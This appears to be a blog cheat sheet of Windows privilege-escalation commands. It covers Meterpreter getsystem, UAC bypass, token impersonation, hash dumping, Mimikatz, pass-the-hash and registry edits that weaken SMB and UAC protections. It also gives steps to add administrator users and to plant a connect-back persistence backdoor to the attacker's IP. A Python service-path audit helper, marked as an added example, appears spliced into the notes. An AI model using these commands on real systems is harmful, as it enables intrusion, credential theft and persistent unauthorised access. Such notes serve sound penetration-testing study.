H3dg3h0g's Blog

    Privilege Escalation

    Table of Contents

    • Table of Contents
    • Windows
    • With a Meterpreter Shell
    • Incognito (lateral Windows privesc)
    • Unquoted Service Paths
    • Dumping hashes
    • Pass the Hash
    • Mimikatz
    • Enable RDP
    • Connect-back Backdoors
    • Without a Meterpreter Shell
    • List running processes
    • Unquoted Service Paths
    • DLL search order
    • Connect to RDP using a NTLM Hash
    • Create a new user
    • Linux

    Windows

    With a Meterpreter Shell

    getsystem
    Automatically try to privesc
    run post/windows/gather/win_privs
    Enumerate privileges and system info
    bypassuac
    Bypass UAC (might work better to run this before getsystem)

    Incognito (lateral Windows privesc)

    Incognito is a Meterpreter extension built for lateral Windows privesc (token impersonation).

    use incognito
    Load the Incognito extension
    list_tokens -u
    List available users to impersonate
    impersonate_token $USER
    Impersonate a user

    Unquoted Service Paths

    See Privilege Escalation - Unquoted Service Paths

    use exploit/windows/local/trusted_service_path
    Automatically exploit unquoted service paths
    show options
    run

    Dumping hashes

    hashdump
    Dump the password hashes

    If the command fails, migrate to another process, then rerun the command.

    Pass the Hash

    This will only work if we use an administrator account.

    use exploit/windows/smb/psexec
    Performs a pass the hash attack on the machine itself using either a password or a hash
    show options
    run

    If the command fails with Exploit failed [no-access], run the following in PowerShell

    Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
    Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system -Name RequireSecuritySignature -Value 0 -Type DWord

    and rerun the exploit.

    Mimikatz

    Note that Mimikatz works without errors when the meterpreter shell is attached to a 64-bit process.

    ps -A x86_64 -s
    List 64-bit processes
    migrate $PID
    Migrate to a process ID
    load mimikatz
    Load the mimikatz extension
    wdigest
    Try to extract credentials

    Enable RDP

    run getgui -e
    Enable RDP

    If the user is not allowed to connect via RDP, run (in a Windows shell)

    net localgroup "Remote Desktop Users" $USER /add
    Add a user to the Remote Desktop Users group
    rdesktop $IP -u $USER -p $PASSWORD
    Connect to the machine via RDP

    Connect-back Backdoors

    This will generate a connect-back backdoor (a reverse connection: the target initiates the connection to our machine) that will try to connect to us at every reboot.

    persistence -A -X -i 5 -p 8080 -r $OUR_IP
    Start a connect-back backdoor: -A also starts a handler on our machine, -X starts the agent on boot, -i 5 retries every 5 s, -p 8080 connects to our port 8080, -r $OUR_IP is our IP

    To get the shell back later, simply start a handler on port 8080 (with the same payload, LHOST and LPORT the persistence script used)

    use exploit/multi/handler
    run

    Without a Meterpreter Shell

    List running processes

    net start
    List started services

    Unquoted Service Paths

    This vulnerability happens when a service is configured with a path to a binary which is unquoted and contains spaces.

    In that case, Windows looks for the binary in this order:

    1. C:\Program.exe
    2. C:\Program Files (x86)\Author\Program.exe
    3. C:\Program Files (x86)\Author\Program\SETEVENT.exe

    That way, we can write a reverse shell and name it C:\Program.exe or C:\Program Files (x86)\Author\Program.exe. This executable would be launched when the service starts, rather than the original executable.

    wmic service get name,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
    List all auto-start services outside C:\Windows whose path is unquoted
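    As an added example (not part of these notes), a Python audit helper that parses `wmic service get name,pathname,startmode` output and, for each auto-start service with an unquoted spaced path, lists the prefixes CreateProcess tries before the real binary. It generalises the three-entry list above: every whitespace-delimited prefix is tried in turn, with .exe appended when the prefix has no extension. The wmic sample and service names are constructed.

```python
from __future__ import annotations
import re
from pathlib import PureWindowsPath

# Constructed sample of `wmic service get name,pathname,startmode` output
# (not captured from a real host).
SAMPLE_WMIC = """\
Name      PathName                                                  StartMode
Spooler   C:\\Windows\\System32\\spoolsv.exe                        Auto
VulnSvc   C:\\Program Files (x86)\\Author\\Program\\SETEVENT.exe    Auto
SafeSvc   "C:\\Program Files (x86)\\Author\\Program\\SETEVENT.exe"  Auto
ManSvc    C:\\Some Dir\\svc.exe                                     Manual
"""

# Name column, PathName column (may contain spaces), StartMode column.
ROW_RE = re.compile(r"^(\S+)\s+(.+?)\s+(Auto|Manual|Disabled|Boot|System)\s*$", re.I)


def candidate_paths(path_name: str) -> list[str]:
    """Paths CreateProcess tries, in order, for a service PathName.

    Each whitespace-delimited prefix is tried before the full path, with
    ".exe" appended when the prefix has no extension. A quoted path yields
    only the quoted executable, which is why quoting fixes the issue.
    """
    path_name = path_name.strip()
    if path_name.startswith('"'):
        return [path_name.split('"')[1]]
    parts = path_name.split(" ")
    out = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if not PureWindowsPath(prefix).suffix:
            prefix += ".exe"
        out.append(prefix)
    return out


def unquoted_service_paths(wmic_output: str) -> dict[str, list[str]]:
    """Auto-start services outside C:\\Windows with an unquoted, spaced path,
    mapped to the candidate paths tried before the real binary (the ones a
    defender must make sure are not writable by unprivileged users)."""
    findings = {}
    for line in wmic_output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        name, path_name, start = m.group(1), m.group(2).strip(), m.group(3)
        if start.lower() != "auto" or path_name.startswith('"'):
            continue
        if path_name.lower().startswith("c:\\windows\\") or " " not in path_name:
            continue
        findings[name] = candidate_paths(path_name)[:-1]
    return findings
```

Remediation for a flagged service is to quote its binary path (sc config <svc> binPath= "\"<full path>\"") and to verify the parent directories of each candidate are not writable by standard users.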

    DLL search order

    When a program is launched, the DLL search order is, generally:

    1. The directory of the executable
    2. C:\Windows\System32
    3. C:\Windows\System
    4. C:\Windows
    5. The current directory when the executable was launched
    6. All directories in the PATH environment variable

    Connect to RDP using an NTLM hash

    xfreerdp /u:$USER /d:$DOMAIN /pth:$HASH /v:$IP

    Create a new user

    net user $USER $PASSWORD /add
    Create a new user
    net localgroup "Administrators" $USER /add
    Add the user to the Administrators group

    Linux